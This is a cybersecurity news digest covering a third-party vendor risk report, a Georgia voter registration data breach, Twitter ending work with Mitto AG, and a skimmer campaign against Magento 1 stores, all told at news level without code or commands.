At a glance.
- Top five threats to third-party vendors.
- Voter data exposed in registration software breach.
- Twitter parts ways with Mitto AG
- Magento skimmers.
Top five threats to third-party vendors.
Security risk management software provider Panorays has released the findings from its annual Third-Party Cyber Gap report. After analyzing data from tens of thousands of third-party vendors, Panorays has identified the most prevalent cyber gaps these companies faced in 2021. 48% said supply chain security issues were caused by significant web assets left unprotected by Web Application Firewalls, followed by compromised credentials (44%) and unpatched web servers (37%). Rounding out the top five were vulnerable default CMS configuration, and a lack of security team personnel, both at 33%. One bright spot was that patching issues are becoming less of an issue, as over half of companies said this was an issue in 2019. Chief Architect at Panorays and report author Giora Omer commented, “It is reassuring to see security teams taking greater initiative to patch their servers in a timely manner, and it’s a trend we hope to see continue in the years to come, particularly in light of the recent Log4j disclosure.”
Voter data exposed in registration software breach.
Software company EasyVote Solutions has disclosed that it experienced a data breach that exposed registration information of voters in the state of Georgia. The Atlanta Journal-Constitution explains EasyVote provides software for expediting the voter registration process in several Georgia counties. The stolen data was published on an online forum and likely included names, addresses, races, and dates of birth, but fortunately, according to EasyVote’s chief financial officer Charles Davis, Social Security numbers and driver’s license numbers were not compromised. The company learned of the breach on January 31, but it’s unclear just how many voters were impacted.
Twitter parts ways with Mitto AG
Following allegations that Swiss automated messaging solutions company Mitto AG helped governments spy on citizens, Twitter has informed US Senator Ron Wyden that it will no longer work with the company. Bloomberg explains that Twitter used Mitto’s services to send sensitive passcodes to users, and by severing ties, the social media company is following in the recent footsteps of messaging companies Kaleyra and MessageBird. The allegations, which surfaced in a Bloomberg News and London-based Bureau of Investigative Journalism report in December, claim that Mitto co-founder and chief operating officer Ilja Gorelik secretly sold access to Mitto’s networks to help governments track and obtain the call logs of individuals’ phones. Mitto has also been accused of exploiting weaknesses in the Signaling System 7 telecommunications protocol.
Magento skimmers.
After investigating the mass breach of over five hundred e-commerce stores running on the Magento 1 platform, security firm Sansec confirmed earlier this week that a common link has been found. All of the impacted stores had been hit with payment skimmer malware called NaturalFreshMall designed to steal shopper’s credit card credentials. The malware domain is now offline, but as Bleeping Computer explains, the hackers exploited a Quickview plugin vulnerability to inject rogue Magento admin users, allowing the attackers to run code with the highest privileges, at which point they injected backdoors to deploy the malware. Adobe stopped supporting the Magento 1 platform back in 2020, but the impacted sites were still using the outdated software. Admins have been advised to ensure all MageCart software is up-to-date.
Kunal Modasiya, senior director of product management at PerimeterX, commented on the incident:
"Magecart attackers are always looking for ways to avoid detection in their quest to steal the credit card information of customers. In this attack, 500 stores were the victim of a payment card skimmer loaded onto the naturalfreshmall.com domain. The actors also abused a known vulnerability in the Quickview plugin, which allowed them to inject Magento admin users that could then run code.
"Given the continued issues with outdated versions of the Magento platform, it is critical that e-commerce companies get real-time alert notifications for the payment card data leak. They should also quickly isolate any third party library changes that have caused the incident, and quickly mitigate the risk by removing or updating the third party library and block the PCI incident to prevent further PCI data leaks.”